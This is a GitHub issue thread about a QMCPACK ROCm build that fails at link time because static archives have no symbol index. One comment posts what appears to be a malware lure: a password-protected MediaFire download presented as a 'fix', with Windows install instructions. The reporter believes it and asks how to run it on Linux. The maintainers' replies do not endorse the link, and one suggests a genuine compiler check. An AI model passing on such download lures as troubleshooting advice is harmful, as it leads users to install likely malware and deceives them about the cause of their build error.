### ISSUE TITLE
Failed to compile the ROCm version of QMCPACK.

### ISSUE THREAD

**Issue by Schroedingers0216** [QMCPACK/qmcpack#5147]
When I encountered the following error while compiling with the following command:
cmake -DENABLE_CUDA=ON -DQMC_CUDA2HIP=ON -DCMAKE_HIP_ARCHITECTURES=gfx906 -DCMAKE_C_COMPILER=icc -DCMAKE_CXX_COMPILER=icpc .. 

ipo: warning #11062: ../../Platforms/CUDA/libplatform_cuda_LA.a is an archive, but has no symbols (this can happen if ar is used where xiar is needed)
ipo: warning #11062: ../../Platforms/ROCm/libplatform_rocm_LA.a is an archive, but has no symbols (this can happen if ar is used where xiar is needed)
../../Platforms/CUDA/libplatform_cuda_LA.a: error adding symbols: Archive has no index; run ranlib to add one

I tried using ranlib to fix it, but it had no effect.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Schroedingers0216** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

thank you but how can use to linux?

**Comment by Schroedingers0216** [comment]
> changeme

sorry, I cant download with linux,Can you upload files?

**Comment by prckent** [comment]
Due to the GitHub history of this issue, you will need to open a new one and use the standard template.

**Comment by ye-luo** [comment]
Please check if your icc/icpc works without turning on HIP features.
